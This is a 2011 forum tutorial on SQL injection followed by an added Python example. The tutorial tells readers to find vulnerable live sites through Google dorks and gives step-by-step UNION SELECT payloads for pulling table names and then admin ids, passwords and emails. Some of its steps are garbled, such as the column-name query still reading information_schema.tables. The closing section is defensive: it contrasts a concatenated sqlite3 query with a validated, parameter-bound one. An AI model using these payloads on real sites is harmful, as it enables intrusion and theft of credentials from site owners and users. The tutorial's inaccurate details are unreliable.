Admin
Subject: SQL injection TuT (Sun Nov 06, 2011 5:57 pm)

Okay, I am going to be teaching you how to SQL inject. You can find vulnerable sites by searching on Google:
- index.php?id=1
You can find more if you search Google for SQL dorks. Okay, now that you have your vulnerable site, put a ' after the number like this:
- http://examplesite.com/index.php?id=1'
Errors should come up; if they do not, it's not vulnerable. Now we are going to find out how many columns are in the database. Put "order by 1--" until you see an error, like this:
- http://examplesite.com/index.php?id=1 order by 1--
Now that you have all the columns, put "UNION SELECT" then the number of columns like this:
- http://examplesite.com/index.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9--
Now you can see the vulnerable columns you can change. Now we need the version, so if 5 is vulnerable:
- http://examplesite.com/index.php?id=-1 UNION SELECT 1,2,3,4,@@version,6,7,8,9--
The version should pop up, and sometimes it will come encrypted, so you should get a decrypter. Now we are going to change @@version to "group_concat(table_name)" and change "--" to "+from+information_schema.tables+where+table_schema=database()--". The columns will have names on them, like this:
- http://examplesite.com/index.php?id=-1 UNION SELECT 1,2,3,4,group_concat(table_name),6,7,8,9+from+information_schema.tables+where+table_schema=database()--
Now replace group_concat(table_name) with group_concat(column_name):
- http://examplesite.com/index.php?id=-1 UNION SELECT 1,2,3,4, group_concat(column_name),6,7,8,9+from+information_schema.tables+where+table_schema=database()--
Now you have to replace group_concat(column_name) with group_concat(id,0x3a,pass,0x3a,mail) and replace +from+information_schema.tables+where+table_schema=database() with +from+x_admins:
- http://examplesite.com/index.php?id=-1 UNION SELECT 1,2,3,4, group_concat(id,0x3a,pass,0x3a,mail),6,7,8,9+from+x_admins--
You have just SQL injected a site.
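Every request in the post depends on the application pasting the `id` parameter straight into its SQL text. The following is an added example, not part of the original post: it uses Python's `sqlite3` with a constructed in-memory database to put that flawed query next to a validated, parameter-bound one. The `articles` table, the function names and the sample rows are assumptions made for illustration; `x_admins` and its columns are the names used in the post.

```python
import sqlite3

# Constructed inputs modelled on the post's requests (three columns here).
QUOTE_PROBE = "1'"
UNION_INPUT = "-1 UNION SELECT id, pass, mail FROM x_admins--"

def make_db():
    """Build a constructed in-memory database (sample data, not from the post)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE x_admins (id INTEGER PRIMARY KEY, pass TEXT, mail TEXT);
        INSERT INTO articles VALUES (1, 'Welcome', 'First post');
        INSERT INTO x_admins VALUES (1, 'constructed-hash', 'admin@example.invalid');
    """)
    return db

def fetch_vulnerable(db, raw_id):
    # The flaw: the parameter becomes part of the SQL text, so anything
    # after the number is parsed as SQL instead of being treated as data.
    sql = "SELECT id, title, body FROM articles WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def fetch_hardened(db, raw_id):
    # 1. Validate: this page only ever needs a non-negative decimal id.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a decimal integer")
    # 2. Bind: the value is sent separately from the SQL text, so it can
    #    never change the shape of the statement.
    sql = "SELECT id, title, body FROM articles WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def outcome(fetch, db, raw_id):
    """Return the rows, or the name of the exception the call raised."""
    try:
        return fetch(db, raw_id)
    except (sqlite3.Error, ValueError) as exc:
        return type(exc).__name__

if __name__ == "__main__":
    db = make_db()
    for raw in ("1", QUOTE_PROBE, UNION_INPUT):
        print(repr(raw))
        print("  concatenated:", outcome(fetch_vulnerable, db, raw))
        print("  bound       :", outcome(fetch_hardened, db, raw))
```

With the concatenated query the quote surfaces as a database syntax error and the UNION input returns the `x_admins` row; the hardened function rejects both before any SQL runs.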